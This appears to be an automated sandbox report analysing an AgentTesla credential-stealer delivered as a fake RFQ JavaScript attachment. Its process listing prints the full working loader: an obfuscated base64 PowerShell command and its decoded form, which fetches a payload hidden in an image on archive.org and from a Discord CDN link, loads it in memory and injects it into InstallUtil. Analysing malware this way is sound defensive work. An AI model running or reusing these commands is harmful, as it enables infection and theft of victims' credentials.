                                                Aug 27, 2024 07:53:49.610611916 CEST58749707185.230.212.164192.168.2.5220 Ready to start TLS.
                                                Aug 27, 2024 07:53:52.821928978 CEST58749708185.230.212.164192.168.2.5220 mx.zoho.eu SMTP Server ready August 27, 2024 7:53:52 AM CEST
                                                Aug 27, 2024 07:53:52.822129965 CEST49708587192.168.2.5185.230.212.164EHLO 045012
                                                Aug 27, 2024 07:53:53.002490044 CEST58749708185.230.212.164192.168.2.5250-mx.zoho.eu Hello 045012 (8.46.123.33 (8.46.123.33))
                                                250-STARTTLS
                                                Aug 27, 2024 07:53:53.133933067 CEST58749708185.230.212.164192.168.2.5250 SIZE 53477376
                                                Aug 27, 2024 07:53:53.134187937 CEST49708587192.168.2.5185.230.212.164STARTTLS
                                                Aug 27, 2024 07:53:53.312863111 CEST58749708185.230.212.164192.168.2.5220 Ready to start TLS.

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:01:53:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ448903423_MAT_HASUE_de_Mexico.js"
                                                Imagebase:0x7ff613d40000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:01:53:38
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? VQBy? ? ? ? Gw? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? JwBo? ? ? ? HQ? ? ? ? d? ? ? ? Bw? ? ? ? HM? ? ? ? Og? ? ? ? v? ? ? ? C8? ? ? ? aQBh? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? x? ? ? ? DY? ? ? ? M? ? ? ? ? ? ? ? 2? ? ? ? C4? ? ? ? dQBz? ? ? ? C4? ? ? ? YQBy? ? ? ? GM? ? ? ? a? ? ? ? Bp? ? ? ? HY? ? ? ? ZQ? ? ? ? u? ? ? ? G8? ? ? ? cgBn? ? ? ? C8? ? ? ? MQ? ? ? ? w? ? ? ? C8? ? ? ? aQB0? ? ? ? GU? ? ? ? bQBz? ? ? ? C8? ? ? ? Z? ? ? ? Bl? ? ? ? GE? ? ? ? d? ? ? ? Bo? ? ? ? G4? ? ? ? bwB0? ? ? ? GU? ? ? ? Xw? ? ? ? y? ? ? ? D? ? ? ? ? ? ? ? Mg? ? ? ? 0? ? ? ? D? ? ? ? ? ? ? ? Nw? ? ? ? v? ? ? ? GQ? ? ? ? ZQBh? ? ? ? HQ? ? ? ? a? ? ? ? Bu? ? ? ? G8? ? ? ? d? ? ? ? Bl? ? ? ? C4? ? ? ? agBw? ? ? ? Gc? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? dwBl? ? ? ? GI? ? ? ? QwBs? ? ? ? Gk? ? ? ? ZQBu? ? ? ? HQ? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? TgBl? ? ? ? Hc? ? ? ? LQBP? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? TgBl? ? ? ? HQ? ? ? ? LgBX? ? ? ? GU? ? ? ? YgBD? ? ? ? Gw? ? ? ? aQBl? ? ? ? G4? ? ? ? d? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Hc? ? ? ? ZQBi? ? ? ? EM? ? ? ? b? ? ? ? Bp? ? ? ? GU? ? ? ? bgB0? ? ? ? C4? ? ? ? R? ? ? ? Bv? ? ? ? Hc? ? ? ? bgBs? ? ? ? G8? ? ? ? YQBk? ? ? ? EQ? ? ? ? YQB0? ? ? ? GE? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBV? ? ? ? HI? ? ? ? b? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bp? ? ? ? G0? ? ? ? YQBn? ? ? ? GU? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? V? ? ? ? Bl? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? EU? ? ? ? bgBj? ? ? ? G8? ? ? ? Z? ? ? ? Bp? ? ? ? G4? ? ? ? ZwBd? ? ? ? Do? ? ? ? OgBV? ? ? ? FQ? ? ? ? Rg? ? ? ? 4? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? UwB0? ? ? ? HI? ? ? ? aQBu? ? ? ? Gc? ? ? ? K? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBC? ? ? ? Hk? ? ? ? d? ? ? ? Bl? ? ? ? HM? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBT? ? ? ? FQ? ? ? ? QQBS? ? ? ? FQ? ? ? ? Pg? ? ? ? +? ? ? ? Cc? ? ? ? Ow? ? ? ? k? ? ? ? GU? ? ? ? bgBk? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? Jw? ? ? ? 8? ? ? ? Dw? ? ? ? QgBB? ? ? ? FM? ? ? ? RQ? ? ? ? 2? ? ? ? DQ? ? ? ? XwBF? ? ? ? E4? ? ? ? R? ? ? ? ? ? ? ? +? ? ? ? D4? ? ? ? Jw? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? ? ? ? ? k? ? ? ? Gk? ? ? ? bQBh? ? ? ? Gc? ? ? ? ZQBU? ? ? ? GU? ? ? ? e? ? ? ? B0? ? ? ? C4? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? E8? ? ? ? Zg? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? KQ? ? ? ? 7? ? ? ? CQ? ? ? ? ZQBu? ? ? ? GQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? TwBm? ? ? ? Cg? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BG? ? ? ? Gw? ? ? ? YQBn? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? HM? ? ? ? d? ? ? ? Bh? ? ? ? HI? ? ? ? d? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? ZQ? ? ? ? g? ? ? ? D? ? ? ? ? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? Gc? ? ? ? d? ? ? ? ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? g? ? ? ? Cs? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? EY? ? ? ? b? ? ? ? Bh? ? ? ? Gc? ? ? ? LgBM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? 7? ? ? ? CQ? ? ? ? YgBh? ? ? ? HM? ? ? ? ZQ? ? ? ? 2? ? ? ? DQ? ? ? ? T? ? ? ? Bl? ? ? ? G4? ? ? ? ZwB0? ? ? ? Gg? ? ? ? I? ? ? ? ? ? ? ? 9? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bl? ? ? ? G4? ? ? ? Z? ? ? ? BJ? ? ? ? G4? ? ? ? Z? ? ? ? Bl? ? ? ? Hg? ? ? ? I? ? ? ? ? ? ? ? t? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bz? ? ? ? HQ? ? ? ? YQBy? ? ? ? HQ? ? ? ? SQBu? ? ? ? GQ? ? ? ? ZQB4? ? ? ? Ds? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? aQBt? ? ? ? GE? ? ? ? ZwBl? ? ? ? FQ? ? ? ? ZQB4? ? ? ? HQ? ? ? ? LgBT? ? ? ? HU? ? ? ? YgBz? ? ? ? HQ? ? ? ? cgBp? ? ? ? G4? ? ? ? Zw? ? ? ? o? ? ? ? CQ? ? ? ? cwB0? ? ? ? GE? ? ? ? cgB0? ? ? ? Ek? ? ? ? bgBk? ? ? ? GU? ? ? ? e? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BM? ? ? ? GU? ? ? ? bgBn? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? QwBv? ? ? ? G4? ? ? ? dgBl? ? ? ? HI? ? ? ? d? ? ? ? Bd? ? ? ? Do? ? ? ? OgBG? ? ? ? HI? ? ? ? bwBt? ? ? ? EI? ? ? ? YQBz? ? ? ? GU? ? ? ? Ng? ? ? ? 0? ? ? ? FM? ? ? ? d? ? ? ? By? ? ? ? Gk? ? ? ? bgBn? ? ? ? Cg? ? ? ? J? ? ? ? Bi? ? ? ? GE? ? ? ? cwBl? ? ? ? DY? ? ? ? N? ? ? ? BD? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? Gw? ? ? ? bwBh? ? ? ? GQ? ? ? ? ZQBk? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQ? ? ? ? g? ? ? ? D0? ? ? ? I? ? ? ? Bb? ? ? ? FM? ? ? ? eQBz? ? ? ? HQ? ? ? ? ZQBt? ? ? ? C4? ? ? ? UgBl? ? ? ? GY? ? ? ? b? ? ? ? Bl? ? ? ? GM? ? ? ? d? ? ? ? Bp? ? ? ? G8? ? ? ? bg? ? ? ? u? ? ? ? EE? ? ? ? cwBz? ? ? ? GU? ? ? ? bQBi? ? ? ? Gw? ? ? ? eQBd? ? ? ? Do? ? ? ? OgBM? ? ? ? G8? ? ? ? YQBk? ? ? ? Cg? ? ? ? J? ? ? ? Bj? ? ? ? G8? ? ? ? bQBt? ? ? ? GE? ? ? ? bgBk? ? ? ? EI? ? ? ? eQB0? ? ? ? GU? ? ? ? cw? ? ? ? p? ? ? ? Ds? ? ? ? J? ? ? ? B0? ? ? ? Hk? ? ? ? c? ? ? ? Bl? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? b? ? ? ? Bv? ? ? ? GE? ? ? ? Z? ? ? ? Bl? ? ? ? GQ? ? ? ? QQBz? ? ? ? HM? ? ? ? ZQBt? ? ? ? GI? ? ? ? b? ? ? ? B5? ? ? ? C4? ? ? ? RwBl? ? ? ? HQ? ? ? ? V? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? o? ? ? ? Cc? ? ? ? Z? ? ? ? Bu? ? ? ? Gw? ? ? ? aQBi? ? ? ? C4? ? ? ? SQBP? ? ? ? C4? ? ? ? S? ? ? ? Bv? ? ? ? G0? ? ? ? ZQ? ? ? ? n? ? ? ? Ck? ? ? ? Ow? ? ? ? k? ? ? ? G0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? C? ? ? ? ? ? ? ? PQ? ? ? ? g? ? ? ? CQ? ? ? ? d? ? ? ? B5? ? ? ? H? ? ? ? ? ? ? ? ZQ? ? ? ? u? ? ? ? Ec? ? ? ? ZQB0? ? ? ? E0? ? ? ? ZQB0? ? ? ? Gg? ? ? ? bwBk? ? ? ? Cg? ? ? ? JwBW? ? ? ? EE? ? ? ? SQ? ? ? ? n? ? ? ? Ck? ? ? ? LgBJ? ? ? ? G4? ? ? ? dgBv? ? ? ? Gs? ? ? ? ZQ? ? ? ? o? ? ? ? CQ? ? ? ? bgB1? ? ? ? Gw? ? ? ? b? ? ? ? ? ? ? ? s? ? ? ? C? ? ? ? ? ? ? ? WwBv? ? ? ? GI? ? ? ? agBl? ? ? ? GM? ? ? ? d? ? ? ? Bb? ? ? ? F0? ? ? ? XQ? ? ? ? g? ? ? ? Cg? ? ? ? Jw? ? ? ? m? ? ? ? GY? ? ? ? O? ? ? ? ? ? ? ? x? ? ? ? DU? ? ? ? ZQ? ? ? ? 1? ? ? ? GY? ? ? ? Yg? ? ? ? 3? ? ? ? DQ? ? ? ? OQ? ? ? ? x? ? ? ? D? ? ? ? ? ? ? ? NgBm? ? ? ? DI? ? ? ? MQ? ? ? ? 3? ? ? ? DI? ? ? ? OQBj? ? ? ? DU? ? ? ? O? ? ? ? Bl? ? ? ? GU? ? ? ? OQBk? ? ? ? DU? ? ? ? Z? ? ? ? ? ? ? ? 0? ? ? ? DM? ? ? ? Ng? ? ? ? y? ? ? ? GY? ? ? ? MQ? ? ? ? x? ? ? ? DM? ? ? ? Z? ? ? ? ? ? ? ? 5? ? ? ? GQ? ? ? ? YgBj? ? ? ? DY? ? ? ? OQBl? ? ? ? Dc? ? ? ? MgBl? ? ? ? D? ? ? ? ? ? ? ? Yg? ? ? ? 2? ? ? ? DQ? ? ? ? Yg? ? ? ? z? ? ? ? GM? ? ? ? M? ? ? ? ? ? ? ? 0? ? ? ? GM? ? ? ? NQ? ? ? ? 3? ? ? ? DQ? ? ? ? Yw? ? ? ? x? ? ? ? GQ? ? ? ? PQBt? ? ? ? Gg? ? ? ? Jg? ? ? ? w? ? ? ? DM? ? ? ? YQBh? ? ? ? GM? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQBz? ? ? ? Gk? ? ? ? Jg? ? ? ? w? ? ? ? GI? ? ? ? YgBm? ? ? ? GQ? ? ? ? Yw? ? ? ? 2? ? ? ? DY? ? ? ? PQB4? ? ? ? GU? ? ? ? PwB0? ? ? ? Hg? ? ? ? d? ? ? ? ? ? ? ? u? ? ? ? Ec? ? ? ? SQBS? ? ? ? E8? ? ? ? Lw? ? ? ? 5? ? ? ? DI? ? ? ? O? ? ? ? ? ? ? ? y? ? ? ? DU? ? ? ? NQ? ? ? ? 5? ? ? ? DE? ? ? ? N? ? ? ? ? ? ? ? x? ? ? ? Dg? ? ? ? Nw? ? ? ? y? ? ? ? DY? ? ? ? Ng? ? ? ? 3? ? ? ? Dc? ? ? ? Mg? ? ? ? x? ? ? ? C8? ? ? ? OQ? ? ? ? 1? ? ? ? DQ? ? ? ? Nw? ? ? ? 1? ? ? ? DE? ? ? ? Mw? ? ? ? 5? ? ? ? D? ? ? ? ? ? ? ? M? ? ? ? ? ? ? ? 4? ? ? ? DE? ? ? ? Mw? ? ? ? z? ? ? ? DQ? ? ? ? Nw? ? ? ? 3? ? ? ? DI? ? ? ? MQ? ? ? ? v? ? ? ? HM? ? ? ? d? ? ? ? Bu? ? ? ? GU? ? ? ? bQBo? ? ? ? GM? ? ? ? YQB0? ? ? ? HQ? ? ? ? YQ? ? ? ? v? ? ? ? G0? ? ? ? bwBj? ? ? ? C4? ? ? ? c? ? ? ? Bw? ? ? ? GE? ? ? ? Z? ? ? ? By? ? ? ? G8? ? ? ? YwBz? ? ? ? Gk? ? ? ? Z? ? ? ? ? ? ? ? u? ? ? ? G4? ? ? ? Z? ? ? ? Bj? ? ? ? C8? ? ? ? Lw? ? ? ? 6? ? ? ? HM? ? ? ? c? ? ? ? B0? ? ? ? HQ? ? ? ? a? ? ? ? ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? MQ? ? ? ? n? ? ? ? C? ? ? ? ? ? ? ? L? ? ? ? ? ? ? ? g? ? ? ? Cc? ? ? ? Qw? ? ? ? 6? ? ? ? Fw? ? ? ? U? ? ? ? By? ? ? ? G8? ? ? ? ZwBy? ? ? ? GE? ? ? ? bQBE? ? ? ? GE? ? ? ? d? ? ? ? Bh? ? ? ? Fw? ? ? ? Jw? ? ? ? g? ? ? ? Cw? ? ? ? I? ? ? ? ? ? ? ? n? ? ? ? H? ? ? ? ? ? ? ? YQBk? ? ? ? HI? ? ? ? YQBs? ? ? ? Cc? ? ? ? L? ? ? ? ? ? ? ? n? ? ? ? Ek? ? ? ? bgBz? ? ? ? HQ? ? ? ? YQBs? ? ? ? Gw? ? ? ? VQB0? ? ? ? Gk? ? ? ? b? ? ? ? ? ? ? ? n? ? ? ? Cw? ? ? ? JwBk? ? ? ? GU? ? ? ? cwBh? ? ? ? HQ? ? ? ? aQB2? ? ? ? GE? ? ? ? Z? ? ? ? Bv? ? ? ? Cc? ? ? ? KQ? ? ? ? p? ? ? ? ? ? ? ? ==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('? ? ? ? ','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:01:53:38
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:01:53:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&f815e5fb749106f21729c58ee9d5d4362f113d9dbc69e72e0b64b3c04c574c1d=mh&03aacc66=si&0bbfdc66=xe?txt.GIRO/9282559141872667721/9547513900813347721/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'padral','InstallUtil','desativado'))"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2121822566.000001CE9033B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:01:53:43
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\padral.js"
                                                Imagebase:0x7ff6275a0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:01:53:43
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:01:53:45
                                                Start date:27/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x2e0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:8
                                                Start time:01:53:45
                                                Start date:27/08/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                Imagebase:0x4e0000
                                                File size:42'064 bytes
                                                MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3317780029.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3314034546.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:false

                                                Reset < >
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2177996236.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff848d20000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction ID: 7cb42642e1da3d82757d21bc541deb7dc345a0ebc5e7e05edc84e6195f5ece29
                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                  • Instruction Fuzzy Hash: B801447111CB094FDB48EF0CE451AA6B7E0FB95364F10056DE58AC3665D736E882CB46

                                                  Execution Graph

                                                  Execution Coverage:8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:27
                                                  Total number of Limit Nodes:1
                                                  execution_graph 3498 7ff848d38529 3499 7ff848d38537 ResumeThread 3498->3499 3501 7ff848d3860c 3499->3501 3520 7ff848d37e39 3522 7ff848d37e47 Wow64SetThreadContext 3520->3522 3523 7ff848d37f91 3522->3523 3488 7ff848d3833d 3490 7ff848d3834b WriteProcessMemory 3488->3490 3491 7ff848d384c4 3490->3491 3514 7ff848d35ff2 3515 7ff848d35ffd 3514->3515 3516 7ff848d37bf1 CreateProcessW 3515->3516 3519 7ff848d360f3 Wow64SetThreadContext 3515->3519 3516->3519 3518 7ff848d37f91 3519->3518 3492 7ff848d37a01 3493 7ff848d37a30 CreateProcessW 3492->3493 3495 7ff848d37cc0 Wow64SetThreadContext 3493->3495 3497 7ff848d37f91 3495->3497 3502 7ff848d365f5 3503 7ff848d365ff 3502->3503 3504 7ff848d36842 3503->3504 3507 7ff848d36852 3503->3507 3508 7ff848d35ff0 3504->3508 3509 7ff848d35ff5 3508->3509 3510 7ff848d37bf1 CreateProcessW 3509->3510 3513 7ff848d360f3 Wow64SetThreadContext 3509->3513 3510->3513 3512 7ff848d36850 3512->3507 3513->3512

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 89 7ff848e0091e-7ff848e0092b 91 7ff848e0092d-7ff848e00942 89->91 91->91 92 7ff848e00944-7ff848e0097a 91->92 95 7ff848e009c4-7ff848e009cb 92->95 96 7ff848e0097c-7ff848e009a4 92->96 102 7ff848e009cd-7ff848e009d2 95->102 98 7ff848e00b93-7ff848e00c45 96->98 99 7ff848e009aa-7ff848e009b4 96->99 137 7ff848e00c47 98->137 138 7ff848e00c48-7ff848e00c59 98->138 101 7ff848e009b6-7ff848e009c3 99->101 99->102 101->95 101->102 105 7ff848e00b34-7ff848e00b3e 102->105 106 7ff848e009d8-7ff848e009db 102->106 108 7ff848e00b40-7ff848e00b4c 105->108 109 7ff848e00b4d-7ff848e00b90 105->109 110 7ff848e009f2-7ff848e009f6 106->110 111 7ff848e009dd-7ff848e009e6 106->111 109->98 110->105 117 7ff848e009fc-7ff848e00a33 110->117 111->110 127 7ff848e00a57 117->127 128 7ff848e00a35-7ff848e00a55 117->128 130 7ff848e00a59-7ff848e00a5b 127->130 128->130 130->105 132 7ff848e00a61-7ff848e00a64 130->132 135 7ff848e00a66-7ff848e00a79 132->135 136 7ff848e00a7b 132->136 140 7ff848e00a7d-7ff848e00a7f 135->140 136->140 137->138 141 7ff848e00c5c-7ff848e00c69 138->141 142 7ff848e00c5b 138->142 140->105 145 7ff848e00a85-7ff848e00abf 140->145 143 